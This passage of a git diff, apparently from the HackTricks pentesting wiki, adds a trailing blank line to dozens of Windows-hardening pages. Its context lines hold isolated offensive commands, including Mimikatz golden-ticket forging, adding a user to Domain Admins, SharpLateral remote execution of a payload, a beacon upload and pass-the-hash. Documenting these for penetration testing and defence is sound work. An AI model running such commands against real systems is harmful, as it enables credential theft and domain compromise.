@@ -308,3 +308,4 @@ Get-NetGroupMember -Identity "Server Operators" -Recurse
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
index 15fbe4a25..3378c48be 100644
--- a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
@@ -75,3 +75,4 @@ beacon> upload C:\Payloads\pivot.exe
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
index 26d91d5e9..c05565162 100644
--- a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
@@ -136,3 +136,4 @@ Lear about the [**available service tickets here**](silver-ticket.md#available-s
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/security-descriptors.md b/src/windows-hardening/active-directory-methodology/security-descriptors.md
index 6021490a5..d99287a4b 100644
--- a/src/windows-hardening/active-directory-methodology/security-descriptors.md
+++ b/src/windows-hardening/active-directory-methodology/security-descriptors.md
@@ -51,3 +51,4 @@ Check [**Silver Tickets**](silver-ticket.md) to learn how you could use the hash
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/sid-history-injection.md b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
index 5352b04b8..24abc3e50 100644
--- a/src/windows-hardening/active-directory-methodology/sid-history-injection.md
+++ b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
@@ -139,3 +139,4 @@ raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/silver-ticket.md b/src/windows-hardening/active-directory-methodology/silver-ticket.md
index 632787cf0..9020f1b44 100644
--- a/src/windows-hardening/active-directory-methodology/silver-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/silver-ticket.md
@@ -154,3 +154,4 @@ dcsync.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/skeleton-key.md b/src/windows-hardening/active-directory-methodology/skeleton-key.md
index 199fb16d5..3fbc10aa5 100644
--- a/src/windows-hardening/active-directory-methodology/skeleton-key.md
+++ b/src/windows-hardening/active-directory-methodology/skeleton-key.md
@@ -31,3 +31,4 @@ Verification after a system reboot is crucial to ensure that the protective meas
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
index eb9045abe..a51844e60 100644
--- a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md
@@ -55,3 +55,4 @@ printers-spooler-service-abuse.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs.md b/src/windows-hardening/authentication-credentials-uac-and-efs.md
index b2ef53f75..6c0413bf2 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs.md
@@ -268,3 +268,4 @@ windows-security-controls/uac-user-account-control.md
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
index 201c3f4f5..157a35998 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
@@ -267,3 +267,4 @@ uac-user-account-control.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
index aee779118..d7f1ce6fa 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.md
@@ -204,3 +204,4 @@ Consists on watching if an **autoElevated binary** tries to **read** from the **
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/av-bypass.md b/src/windows-hardening/av-bypass.md
index e22accaa7..5908cc513 100644
--- a/src/windows-hardening/av-bypass.md
+++ b/src/windows-hardening/av-bypass.md
@@ -570,3 +570,4 @@ https://github.com/praetorian-code/vulcan
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/basic-cmd-for-pentesters.md b/src/windows-hardening/basic-cmd-for-pentesters.md
index b833daece..03848080b 100644
--- a/src/windows-hardening/basic-cmd-for-pentesters.md
+++ b/src/windows-hardening/basic-cmd-for-pentesters.md
@@ -467,3 +467,4 @@ powershell -ep bypass - < c:\temp:ttt
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md
index 8d1a4f791..46272c13d 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/README.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md
@@ -467,3 +467,4 @@ RawDescriptor    : System.Security.AccessControl.CommonSecurityDescriptor
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/powerview.md b/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
index bdb23e473..2bae4437e 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -337,3 +337,4 @@ Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/checklist-windows-privilege-escalation.md b/src/windows-hardening/checklist-windows-privilege-escalation.md
index 3d897fcc4..960560333 100644
--- a/src/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/src/windows-hardening/checklist-windows-privilege-escalation.md
@@ -114,3 +114,4 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/cobalt-strike.md b/src/windows-hardening/cobalt-strike.md
index 6cf274944..2ad645c24 100644
--- a/src/windows-hardening/cobalt-strike.md
+++ b/src/windows-hardening/cobalt-strike.md
@@ -236,3 +236,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
 
 
 
+
diff --git a/src/windows-hardening/lateral-movement/README.md b/src/windows-hardening/lateral-movement/README.md
index 8c702979d..f43129809 100644
--- a/src/windows-hardening/lateral-movement/README.md
+++ b/src/windows-hardening/lateral-movement/README.md
@@ -17,3 +17,4 @@ There are different different ways to execute commands in external systems, here
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/lateral-movement/atexec.md b/src/windows-hardening/lateral-movement/atexec.md
index a04950330..e72baf864 100644
--- a/src/windows-hardening/lateral-movement/atexec.md
+++ b/src/windows-hardening/lateral-movement/atexec.md
@@ -33,3 +33,4 @@ More information about the [**use of schtasks with silver tickets here**](../act
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/lateral-movement/dcom-exec.md b/src/windows-hardening/lateral-movement/dcom-exec.md
index 2f0e646d1..2d8634803 100644
--- a/src/windows-hardening/lateral-movement/dcom-exec.md
+++ b/src/windows-hardening/lateral-movement/dcom-exec.md
@@ -119,3 +119,4 @@ SharpLateral.exe reddcom HOSTNAME C:\Users\Administrator\Desktop\malware.exe
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/lateral-movement/psexec-and-winexec.md b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
index 927127441..68b6b35af 100644
--- a/src/windows-hardening/lateral-movement/psexec-and-winexec.md
+++ b/src/windows-hardening/lateral-movement/psexec-and-winexec.md
@@ -38,3 +38,4 @@ SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/lateral-movement/smbexec.md b/src/windows-hardening/lateral-movement/smbexec.md
index 1d6dc29b1..02f08dc46 100644
--- a/src/windows-hardening/lateral-movement/smbexec.md
+++ b/src/windows-hardening/lateral-movement/smbexec.md
@@ -42,3 +42,4 @@ FOr further details check [https://blog.ropnop.com/using-credentials-to-own-wind
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/lateral-movement/winrm.md b/src/windows-hardening/lateral-movement/winrm.md
index 913866940..0ccd9da50 100644
--- a/src/windows-hardening/lateral-movement/winrm.md
+++ b/src/windows-hardening/lateral-movement/winrm.md
@@ -7,3 +7,4 @@ For information about [**WinRM read this page**](../../network-services-pentesti
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/lateral-movement/wmiexec.md b/src/windows-hardening/lateral-movement/wmiexec.md
index 8a6438453..f2ad2bc88 100644
--- a/src/windows-hardening/lateral-movement/wmiexec.md
+++ b/src/windows-hardening/lateral-movement/wmiexec.md
@@ -130,3 +130,4 @@ SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md
index c35b4d26f..636a296ec 100644
--- a/src/windows-hardening/ntlm/README.md
+++ b/src/windows-hardening/ntlm/README.md
@@ -287,3 +287,4 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/ntlm/atexec.md b/src/windows-hardening/ntlm/atexec.md
index a04950330..e72baf864 100644
--- a/src/windows-hardening/ntlm/atexec.md
+++ b/src/windows-hardening/ntlm/atexec.md
@@ -33,3 +33,4 @@ More information about the [**use of schtasks with silver tickets here**](../act
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md b/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
index c9c9db24b..ba8af657f 100644
--- a/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
+++ b/src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/ntlm/psexec-and-winexec.md b/src/windows-hardening/ntlm/psexec-and-winexec.md
index 9909bcf29..a52930b0d 100644
--- a/src/windows-hardening/ntlm/psexec-and-winexec.md
+++ b/src/windows-hardening/ntlm/psexec-and-winexec.md
@@ -40,3 +40,4 @@ SharpLateral.exe redexec HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/ntlm/smbexec.md b/src/windows-hardening/ntlm/smbexec.md
index 5615536c2..f0682e08e 100644
--- a/src/windows-hardening/ntlm/smbexec.md
+++ b/src/windows-hardening/ntlm/smbexec.md
@@ -40,3 +40,4 @@ FOr further details check [https://blog.ropnop.com/using-credentials-to-own-wind
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/ntlm/winrm.md b/src/windows-hardening/ntlm/winrm.md
index 913866940..0ccd9da50 100644
--- a/src/windows-hardening/ntlm/winrm.md
+++ b/src/windows-hardening/ntlm/winrm.md
@@ -7,3 +7,4 @@ For information about [**WinRM read this page**](../../network-services-pentesti
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/ntlm/wmiexec.md b/src/windows-hardening/ntlm/wmiexec.md
index 8a6438453..f2ad2bc88 100644
--- a/src/windows-hardening/ntlm/wmiexec.md
+++ b/src/windows-hardening/ntlm/wmiexec.md
@@ -130,3 +130,4 @@ SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/stealing-credentials/README.md b/src/windows-hardening/stealing-credentials/README.md
index 799148b43..20a326530 100644
--- a/src/windows-hardening/stealing-credentials/README.md
+++ b/src/windows-hardening/stealing-credentials/README.md
@@ -324,3 +324,4 @@ Download it from:[ http://www.tarasco.org/security/pwdump_7](http://www.tarasco.
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
index f903a894d..b4de2f109 100644
--- a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
+++ b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
@@ -212,3 +212,4 @@ mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/stealing-credentials/credentials-protections.md b/src/windows-hardening/stealing-credentials/credentials-protections.md
index 974bfa98c..ac2fc2bfd 100644
--- a/src/windows-hardening/stealing-credentials/credentials-protections.md
+++ b/src/windows-hardening/stealing-credentials/credentials-protections.md
@@ -118,3 +118,4 @@ For more detailed information, consult the official [documentation](https://docs
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/stealing-credentials/wts-impersonator.md b/src/windows-hardening/stealing-credentials/wts-impersonator.md
index 05cb163a8..06388e3cf 100644
--- a/src/windows-hardening/stealing-credentials/wts-impersonator.md
+++ b/src/windows-hardening/stealing-credentials/wts-impersonator.md
@@ -50,3 +50,4 @@ WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken →
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md
index 27aef6bcd..27d45f03f 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
@@ -1620,3 +1620,4 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
index dc9726a3a..2138fb1ca 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
@@ -110,3 +110,4 @@ Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index ace594ff7..36f8f26d5 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -153,3 +153,4 @@ In summary, ACLs and ACEs help define precise access controls, ensuring that onl
 
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
index 7a32103ba..06a9bfe5c 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md
@@ -28,3 +28,4 @@ Although the vulnerability was initially disclosed unintentionally through the s
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
index f811cb30c..ffee84a91 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
@@ -81,3 +81,4 @@ Then, you can just create the HKCU entry and everytime the user logs in, your ba
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
index b39cf8cec..4ec95c602 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
@@ -69,3 +69,4 @@ Please note that while this summary aims to provide valuable information, it is
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
index aa862eec5..518fc15f2 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
@@ -239,3 +239,4 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index 5b13574b1..ef0727d8c 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -237,3 +237,4 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index d38fe12d2..1b68a4bc6 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -84,3 +84,4 @@ When the service is re-started, the **dll should be loaded and executed** (you c
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
index e1d574a78..0c6744fc3 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
@@ -106,3 +106,4 @@ With extracted from LDAP computers list you can find every sub network even if y
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
index f30d6f078..4d966072f 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
@@ -120,3 +120,4 @@ int main() {
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 02acd7339..7210ba8fb 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -99,3 +99,4 @@ Due to the restrictions commented in this and the previous section, from a secur
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
index f9d906f10..1cd154432 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
@@ -133,3 +133,4 @@ Then download [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
index 7ab7b43e2..b5c742918 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -693,3 +693,4 @@ Another tool to leak a handle and exploit it.
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
index e1ac9e375..fd0ef26ee 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
@@ -22,3 +22,4 @@ From here just click on **next buttons** and the last **build button and your in
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md b/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
index 15a5056c9..5639ff674 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/named-pipe-client-impersonation.md
@@ -9,3 +9,4 @@ Check: [**https://ired.team/offensive-security/privilege-escalation/windows-name
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
index fb3d99c4c..4c2bb5e4a 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
@@ -184,3 +184,4 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
index 9a7fb9a7b..b274b010c 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
@@ -193,3 +193,4 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
index 19e14a00c..3fa8b6a7d 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
@@ -343,3 +343,4 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
index d1f90b41b..627f1f790 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -96,3 +96,4 @@ nt authority\system
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
index 62b71b264..9ce74e175 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
@@ -215,3 +215,4 @@ int _tmain( int argc, TCHAR* argv[] )
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index 83386f092..43e829a35 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -180,3 +180,4 @@ Inside that process "Administrators" can "Read Memory" and "Read Permissions" wh
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
index 2ed58453d..ca976e406 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
@@ -18,3 +18,4 @@ int main ()
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/windows-hardening/windows-security-controls/uac-user-account-control.md b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
index 70b240a60..5739c7887 100644
--- a/src/windows-hardening/windows-security-controls/uac-user-account-control.md
+++ b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
@@ -204,3 +204,4 @@ Consists on watching if an **autoElevated binary** tries to **read** from the **
 {{#include ../../banners/hacktricks-training.md}}
 
 
+